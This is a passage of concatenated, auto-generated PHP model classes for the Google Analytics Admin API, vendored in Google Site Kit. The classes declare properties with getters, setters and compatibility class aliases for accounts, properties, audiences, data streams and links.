setChangeHistoryEvents($changeHistoryEvents) { $this->changeHistoryEvents = $changeHistoryEvents; } /** * @return GoogleAnalyticsAdminV1betaChangeHistoryEvent[] */ public function getChangeHistoryEvents() { return $this->changeHistoryEvents; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessDateRange extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $endDate; /** * @var string */ public $startDate; /** * @param string */ public function setEndDate($endDate) { $this->endDate = $endDate; } /** * @return string */ public function getEndDate() { return $this->endDate; } /** * @param string */ public function setStartDate($startDate) { $this->startDate = $startDate; } /** * @return string */ public function getStartDate() { return $this->startDate; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessDateRange::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessDateRange'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaRunAccessReportResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'rows'; protected $dimensionHeadersType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessDimensionHeader::class; protected $dimensionHeadersDataType = 'array'; protected $metricHeadersType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessMetricHeader::class; protected $metricHeadersDataType = 'array'; protected $quotaType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuota::class; protected $quotaDataType = ''; /** * @var int */ public $rowCount; protected $rowsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessRow::class; protected $rowsDataType = 'array'; /** * @param GoogleAnalyticsAdminV1alphaAccessDimensionHeader[] */ public function setDimensionHeaders($dimensionHeaders) { $this->dimensionHeaders = $dimensionHeaders; } /** * @return GoogleAnalyticsAdminV1alphaAccessDimensionHeader[] */ public function getDimensionHeaders() { return $this->dimensionHeaders; } /** * @param GoogleAnalyticsAdminV1alphaAccessMetricHeader[] */ public function setMetricHeaders($metricHeaders) { $this->metricHeaders = $metricHeaders; } /** * @return GoogleAnalyticsAdminV1alphaAccessMetricHeader[] */ public function getMetricHeaders() { return $this->metricHeaders; } /** * @param GoogleAnalyticsAdminV1alphaAccessQuota */ public function setQuota(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuota $quota) { $this->quota = $quota; } /** * @return GoogleAnalyticsAdminV1alphaAccessQuota */ public function getQuota() { return $this->quota; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } /** * @param GoogleAnalyticsAdminV1alphaAccessRow[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return GoogleAnalyticsAdminV1alphaAccessRow[] */ public function getRows() { return $this->rows; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaRunAccessReportResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaRunAccessReportResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $displayName; /** * @var string */ public $name; /** * @var string */ public $secretValue; /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setSecretValue($secretValue) { $this->secretValue = $secretValue; } /** * @return string */ public function getSecretValue() { return $this->secretValue; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaFirebaseLink extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $createTime; /** * @var string */ public $name; /** * @var string */ public $project; /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setProject($project) { $this->project = $project; } /** * @return string */ public function getProject() { return $this->project; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaFirebaseLink::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaFirebaseLink'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaProperty extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $account; /** * @var string */ public $createTime; /** * @var string */ public $currencyCode; /** * @var string */ public $deleteTime; /** * @var string */ public $displayName; /** * @var string */ public $expireTime; /** * @var string */ public $industryCategory; /** * @var string */ public $name; /** * @var string */ public $parent; /** * @var string */ public $propertyType; /** * @var string */ public $serviceLevel; /** * @var string */ public $timeZone; /** * @var string */ public $updateTime; /** * @param string */ public function setAccount($account) { $this->account = $account; } /** * @return string */ public function getAccount() { return $this->account; } /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setCurrencyCode($currencyCode) { $this->currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } /** * @param string */ public function setDeleteTime($deleteTime) { $this->deleteTime = $deleteTime; } /** * @return string */ public function getDeleteTime() { return $this->deleteTime; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setExpireTime($expireTime) { $this->expireTime = $expireTime; } /** * @return string */ public function getExpireTime() { return $this->expireTime; } /** * @param string */ public function setIndustryCategory($industryCategory) { $this->industryCategory = $industryCategory; } /** * @return string */ public function getIndustryCategory() { return $this->industryCategory; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setParent($parent) { $this->parent = $parent; } /** * @return string */ public function getParent() { return $this->parent; } /** * @param string */ public function setPropertyType($propertyType) { $this->propertyType = $propertyType; } /** * @return string */ public function getPropertyType() { return $this->propertyType; } /** * @param string */ public function setServiceLevel($serviceLevel) { $this->serviceLevel = $serviceLevel; } /** * @return string */ public function getServiceLevel() { return $this->serviceLevel; } /** * @param string */ public function setTimeZone($timeZone) { $this->timeZone = $timeZone; } /** * @return string */ public function getTimeZone() { return $this->timeZone; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaProperty::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaProperty'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessNumericFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $operation; protected $valueType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaNumericValue::class; protected $valueDataType = ''; /** * @param string */ public function setOperation($operation) { $this->operation = $operation; } /** * @return string */ public function getOperation() { return $this->operation; } /** * @param GoogleAnalyticsAdminV1betaNumericValue */ public function setValue(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaNumericValue $value) { $this->value = $value; } /** * @return GoogleAnalyticsAdminV1betaNumericValue */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessNumericFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessNumericFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpressionList extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'filterExpressions'; protected $filterExpressionsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression::class; protected $filterExpressionsDataType = 'array'; /** * @param GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression[] */ public function setFilterExpressions($filterExpressions) { $this->filterExpressions = $filterExpressions; } /** * @return GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpression[] */ public function getFilterExpressions() { return $this->filterExpressions; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpressionList::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaExpandedDataSetFilterExpressionList'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterStringFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $caseSensitive; /** * @var string */ public $matchType; /** * @var string */ public $value; /** * @param bool */ public function setCaseSensitive($caseSensitive) { $this->caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string */ public function setMatchType($matchType) { $this->matchType = $matchType; } /** * @return string */ public function getMatchType() { return $this->matchType; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterStringFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterStringFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaSearchAds360Link extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $adsPersonalizationEnabled; /** * @var string */ public $advertiserDisplayName; /** * @var string */ public $advertiserId; /** * @var bool */ public $campaignDataSharingEnabled; /** * @var bool */ public $costDataSharingEnabled; /** * @var string */ public $name; /** * @var bool */ public $siteStatsSharingEnabled; /** * @param bool */ public function setAdsPersonalizationEnabled($adsPersonalizationEnabled) { $this->adsPersonalizationEnabled = $adsPersonalizationEnabled; } /** * @return bool */ public function getAdsPersonalizationEnabled() { return $this->adsPersonalizationEnabled; } /** * @param string */ public function setAdvertiserDisplayName($advertiserDisplayName) { $this->advertiserDisplayName = $advertiserDisplayName; } /** * @return string */ public function getAdvertiserDisplayName() { return $this->advertiserDisplayName; } /** * @param string */ public function setAdvertiserId($advertiserId) { $this->advertiserId = $advertiserId; } /** * @return string */ public function getAdvertiserId() { return $this->advertiserId; } /** * @param bool */ public function setCampaignDataSharingEnabled($campaignDataSharingEnabled) { $this->campaignDataSharingEnabled = $campaignDataSharingEnabled; } /** * @return bool */ public function getCampaignDataSharingEnabled() { return $this->campaignDataSharingEnabled; } /** * @param bool */ public function setCostDataSharingEnabled($costDataSharingEnabled) { $this->costDataSharingEnabled = $costDataSharingEnabled; } /** * @return bool */ public function getCostDataSharingEnabled() { return $this->costDataSharingEnabled; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param bool */ public function setSiteStatsSharingEnabled($siteStatsSharingEnabled) { $this->siteStatsSharingEnabled = $siteStatsSharingEnabled; } /** * @return bool */ public function getSiteStatsSharingEnabled() { return $this->siteStatsSharingEnabled; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchAds360Link::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaSearchAds360Link'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAndroidAppDataStream extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $createTime; /** * @var string */ public $displayName; /** * @var string */ public $firebaseAppId; /** * @var string */ public $name; /** * @var string */ public $packageName; /** * @var string */ public $updateTime; /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setFirebaseAppId($firebaseAppId) { $this->firebaseAppId = $firebaseAppId; } /** * @return string */ public function getFirebaseAppId() { return $this->firebaseAppId; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPackageName($packageName) { $this->packageName = $packageName; } /** * @return string */ public function getPackageName() { return $this->packageName; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAndroidAppDataStream::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAndroidAppDataStream'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaListAccountsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'accounts'; protected $accountsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccount::class; protected $accountsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1betaAccount[] */ public function setAccounts($accounts) { $this->accounts = $accounts; } /** * @return GoogleAnalyticsAdminV1betaAccount[] */ public function getAccounts() { return $this->accounts; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListAccountsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaListAccountsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceSequenceFilter extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'sequenceSteps'; /** * @var string */ public $scope; /** * @var string */ public $sequenceMaximumDuration; protected $sequenceStepsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceSequenceFilterAudienceSequenceStep::class; protected $sequenceStepsDataType = 'array'; /** * @param string */ public function setScope($scope) { $this->scope = $scope; } /** * @return string */ public function getScope() { return $this->scope; } /** * @param string */ public function setSequenceMaximumDuration($sequenceMaximumDuration) { $this->sequenceMaximumDuration = $sequenceMaximumDuration; } /** * @return string */ public function getSequenceMaximumDuration() { return $this->sequenceMaximumDuration; } /** * @param GoogleAnalyticsAdminV1alphaAudienceSequenceFilterAudienceSequenceStep[] */ public function setSequenceSteps($sequenceSteps) { $this->sequenceSteps = $sequenceSteps; } /** * @return GoogleAnalyticsAdminV1alphaAudienceSequenceFilterAudienceSequenceStep[] */ public function getSequenceSteps() { return $this->sequenceSteps; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceSequenceFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceSequenceFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudience extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'filterClauses'; /** * @var bool */ public $adsPersonalizationEnabled; /** * @var string */ public $description; /** * @var string */ public $displayName; protected $eventTriggerType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceEventTrigger::class; protected $eventTriggerDataType = ''; /** * @var string */ public $exclusionDurationMode; protected $filterClausesType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterClause::class; protected $filterClausesDataType = 'array'; /** * @var int */ public $membershipDurationDays; /** * @var string */ public $name; /** * @param bool */ public function setAdsPersonalizationEnabled($adsPersonalizationEnabled) { $this->adsPersonalizationEnabled = $adsPersonalizationEnabled; } /** * @return bool */ public function getAdsPersonalizationEnabled() { return $this->adsPersonalizationEnabled; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param GoogleAnalyticsAdminV1alphaAudienceEventTrigger */ public function setEventTrigger(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceEventTrigger $eventTrigger) { $this->eventTrigger = $eventTrigger; } /** * @return GoogleAnalyticsAdminV1alphaAudienceEventTrigger */ public function getEventTrigger() { return $this->eventTrigger; } /** * @param string */ public function setExclusionDurationMode($exclusionDurationMode) { $this->exclusionDurationMode = $exclusionDurationMode; } /** * @return string */ public function getExclusionDurationMode() { return $this->exclusionDurationMode; } /** * @param GoogleAnalyticsAdminV1alphaAudienceFilterClause[] */ public function setFilterClauses($filterClauses) { $this->filterClauses = $filterClauses; } /** * @return GoogleAnalyticsAdminV1alphaAudienceFilterClause[] */ public function getFilterClauses() { return $this->filterClauses; } /** * @param int */ public function setMembershipDurationDays($membershipDurationDays) { $this->membershipDurationDays = $membershipDurationDays; } /** * @return int */ public function getMembershipDurationDays() { return $this->membershipDurationDays; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudience::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudience'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListIosAppDataStreamsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'iosAppDataStreams'; protected $iosAppDataStreamsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaIosAppDataStream::class; protected $iosAppDataStreamsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaIosAppDataStream[] */ public function setIosAppDataStreams($iosAppDataStreams) { $this->iosAppDataStreams = $iosAppDataStreams; } /** * @return GoogleAnalyticsAdminV1alphaIosAppDataStream[] */ public function getIosAppDataStreams() { return $this->iosAppDataStreams; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListIosAppDataStreamsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListIosAppDataStreamsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAcknowledgeUserDataCollectionResponse extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAcknowledgeUserDataCollectionResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAcknowledgeUserDataCollectionResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaKeyEventDefaultValue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $currencyCode; public $numericValue; /** * @param string */ public function setCurrencyCode($currencyCode) { $this->currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } public function setNumericValue($numericValue) { $this->numericValue = $numericValue; } public function getNumericValue() { return $this->numericValue; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaKeyEventDefaultValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaKeyEventDefaultValue'); <?php 